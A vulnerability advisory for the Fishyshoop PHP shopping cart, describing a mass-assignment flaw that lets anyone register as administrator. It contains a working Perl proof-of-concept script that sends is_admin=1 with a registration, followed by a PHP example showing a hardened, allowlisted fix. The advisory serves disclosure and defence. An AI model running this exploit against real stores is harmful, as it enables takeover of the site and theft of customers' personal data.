Fishyshoop Security Vulnerability

Risk: Low
Local: Yes
Remote: Yes
CWE: CWE-Other

CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

Synopsis
========
The Fishyshoop shopping cart software contains a vulnerability which allows arbitrary users to create accounts with administrator privileges.

Background
==========
Fishyshoop is a suite of PHP scripts allowing anybody to create an attractive online store.

Affected Versions
=================
Verified on 0.930 beta. Previous versions may also be affected.

Impact
======
The user gains administrator privileges in the software, meaning they are free to alter many aspects of the store, as well as to steal personal information belonging to other users of the store.

Description
===========
pages/register/register.php takes every POST variable and inserts the value into a new record under a field with the same name. If a new registration is made with the variable is_admin set to 1, the account will have administrator privileges on the site.

Proof of Concept
================
#!/usr/bin/perl
use WWW::Curl::Easy;

sub usage() {
    print "$0 <Fishyshoop root URL> <Desired E-Mail> <Desired Password>\n";
    exit();
}

$FSURL=shift or usage();
$UNAME=shift or usage();
$PASS=shift or usage();

# Registration request with the extra is_admin field described above
my $fishyshoop = new WWW::Curl::Easy;
$fishyshoop->setopt(CURLOPT_URL, "$FSURL?L=register.register");
$fishyshoop->setopt(CURLOPT_POST, 1);
$fishyshoop->setopt(CURLOPT_POSTFIELDS, "email=$UNAME&password=$PASS&is_admin=1&submit=1");
$fishyshoop->perform;
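The mass-assignment pattern from the Description next to an allowlisted version, as an added example (not Fishyshoop's code and not part of the original advisory). The function names, the `users` table and the sample request are assumptions; only the field names email, password, is_admin and submit come from the advisory.

```php
<?php
// Added example, not Fishyshoop source; names other than the field names are assumed.

// Pattern the advisory describes: every POST variable becomes a column.
function build_record_vulnerable(array $post): array
{
    $record = [];
    foreach ($post as $field => $value) {
        $record[$field] = $value; // a client-sent is_admin=1 is stored as-is
    }
    return $record;
}

// Hardened: copy only allowlisted fields; privilege is decided server-side.
const REGISTRATION_FIELDS = ['email', 'password'];

function build_record_hardened(array $post, array &$rejected = []): array
{
    // Unexpected keys are handed back so the caller can log them.
    $rejected = array_values(array_diff(array_keys($post), REGISTRATION_FIELDS, ['submit']));
    $record = [];
    foreach (REGISTRATION_FIELDS as $field) {
        // $_POST values can be arrays (field[]=x); accept non-empty strings only.
        if (!isset($post[$field]) || !is_string($post[$field]) || $post[$field] === '') {
            throw new InvalidArgumentException("missing or malformed field: $field");
        }
        $record[$field] = $post[$field];
    }
    $record['password'] = password_hash($record['password'], PASSWORD_DEFAULT);
    $record['is_admin'] = 0; // never taken from the request
    return $record;
}

// Column names come from the server-built record; values are bound at execute time.
function insert_sql(string $table, array $record): string
{
    $cols = array_keys($record);
    $marks = array_map(fn($c) => ":$c", $cols);
    return sprintf('INSERT INTO %s (%s) VALUES (%s)', $table, implode(', ', $cols), implode(', ', $marks));
}

// Constructed sample request carrying the extra field from the advisory.
$post = ['email' => 'user@example.test', 'password' => 'constructed-pw', 'is_admin' => '1', 'submit' => '1'];
$bad  = build_record_vulnerable($post);
$good = build_record_hardened($post, $rejected);
echo "vulnerable is_admin: {$bad['is_admin']}\n";
echo "hardened is_admin:   {$good['is_admin']}\n";
echo 'rejected fields:     ' . implode(', ', $rejected) . "\n";
echo insert_sql('users', $good) . "\n";
```

A non-empty rejected list on a registration request is a useful log signal, since a normal registration form never sends fields outside the allowlist.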

